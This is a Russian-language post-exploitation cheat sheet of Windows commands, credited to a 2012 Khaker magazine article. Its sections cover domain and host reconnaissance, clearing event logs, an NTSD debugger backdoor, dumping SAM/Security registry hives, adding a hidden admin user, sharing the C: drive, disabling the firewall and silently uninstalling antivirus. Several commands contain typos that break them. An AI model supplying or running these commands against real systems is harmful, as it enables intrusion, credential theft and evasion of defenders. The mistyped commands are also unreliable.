ipconfig /displaydns - локальный DNS-кеш
netstat -nabo - все сетевые подключения (b - имена процессов, которые установили эти соединения, нужны административные права)
netstat -s -p [tcp|udp|icmp|ip] - статистика и список соединений по протоколу
netstat -r (route print) - таблица маршрутизации
netstat -na | findstr :465 - аналог grep для соединение на определенном порту
net view - SMB хосты сети
net user balabuh /domain - сведения о пользователе balabuh, /domain если он доменный (членство в группах, когда последний раз логинился и т.д.)
net accounts /domain - политику паролей в домене, локально без ключа в конце
net localgroup admins /domain - членов группы admins, локально без ключа в конце
net config workstation - вся информация о пк и пользователе
net share - отрытые шары на пк
type %WINDIR%\System32\drivers\etc\hosts - аналог сat для файла
2). иформация о системе
whoami /all - аналог линуха whoami (также членство в группах, привилегии)
qwinsta - кто работает с сервером удаленно по RDP
ver - версия ядра (в линухе uname)
set - вывод переменных окружения
systeminfo (XP+) - куча инфы о системе
qprocess* - список процессов
qappsrv - список терминальных сервисов
schtasks /query /fo csv /v > %TEMP% - выводит все запланированные задания в csv формате
at - запланированные задачи. Ее можно использовать для поднятия привилегий (нужен администратор) до SYSTEM -> at 15:00 /interactive "d:\temp\1.bat"
schtasks (XP+) - выводит запланированные задания (не требует админских прав в отличии от at)
net start (sc query) - запущенные сервисы
sc getkeyname "имя службы" - получаем key name нужного нам сервиса
sc queryex "полученный key name" - получаем инфу о PID, статус сервиса и т.д.
tasklists (XP+) - список процессов
taskkill [/f] /pid
taskkill [/f] /im
fsutil fsinfo drives - диски в системе
gpresult /z - большой отчет о групповых политиках
3). работа с логами
wevtutil el (win2008) - список логов
wevtutil qe
wevtutil cl
del %WINDIR%\*.log /a /s /q /f - то же только все логов из папки виндовс
4). удаленный доступ
%windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /get-features - права админа, позволяет включить telnet, ftp-клиент на 7, VistaSP1, 2008
%windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /enable-features /featurename:TFTP - включаем TFTP, ftp-клиент (tftp.exe) можем использовать для загрузки файлов в систему
Ntsd-server tcp:port=1337 cal.exe - включаем отладчик (ниже висты, находится в system32/ntsd.exe). То есть подключаем отладчик к процессу какому-нибудь (1 команда), конектимся к нему (2 команда) и вводим .shell и получаем доступ к командной строке (NTSD Backdoor)
Ntsd-remote tcp:server=
net use - подключение шар
5). реестр
reg save HKLM\Security security.hive - сохраняем ветку в файл. (SAM - нужны права админа)
red add [\\TargetIPaddr\][RegDomain][\Key] - добавление ключа в реестр (RED ADD HKLM\Software\MyCo /v Date /t REG_BINARY /d fe123edr)
reg export [RegDomain]\[Key][FileName] - импорт в реестр
reg query [\\TargetIPaddr\][RegDomain][\Key] /v [Valuename!] - поиск по реестру
6). поиск файлов
tree C:\ /f /a > C:\output.txt - вывод директорий в виде дерева в файл
dir \ /s /b | find /l "search string" - ищет по директориям корня (\) и поддиректориям (/s) используя формат base (/b) строку (может быть в названии или пути к файлу)
7). WMIC (Windows Management Interface console)
wmic baseboard get Manufacturer, Model, Product, SerialNumber, Version - объектом может быть также (computersystem, bios, etc), здесь снимаем инфу о материнке
wmic nicconfig get caption, macaddress, ipaddress, DefaultIPGateway - получение инфы о сетевых адаптерах: названия, МАС-адреса и т.д.
wmic nicconfig where "IPEnabled"='TRUE' and DNSDomain IS NOT NUL" get DefaultIPGateway, DHCPServer, DNSDomain, DNSHostName, DNSServerSearchOrder, IPAddress, IPSubnet, MACAddress, WINSEenableLMHostsLookup, WINSPrimaryServer, WINSSEcondaryServer /format:list - подробная инфа об активных сетевых адаптерах
wmic printer get Caption, Default, Direct, Description, Local, Shared, Sharename, Status - получение списка принтеров с их параметрами (сетевые имена также)
wmic os get dootdevice, caption, csname, currenttimezone, installdate, servicepackmajorversion, servicepackminorversion, systemdrive, version, windowsdirectory /format:list - извлечение инфы о системе
wmic product get Caption, InstallDate, Vendor - список установленных программ
wmic path win32_product where "name = 'HP Software Update'" call Uninstall - удаление программы HP Software Update
8). воздействие на систему
net user hacker hacker add - добавление пользователя hacker с таким же паролем
net localgroup administartors /add hacker (hacker /add) - добавление пользователя в групу
net share nothing$=C:\/grant:hacker, FULL /unlimited - расшарить C на полные права для пользователя
net user username /active:yes /domain - разблокировать пользователя
netsh firewall set optmode disable - выключить виндовый фаервол
wmic product get name /value - список софта
wmic product where name="XXX" call uninstall /nointeractive - удаление проги незаметно (например антивирус)
rundll32.exe, user32.dll, LockWorkStation - лочит экран пользователя
(источник Хакер 01/2012 стр. 46 "Правила постэкплуатации")
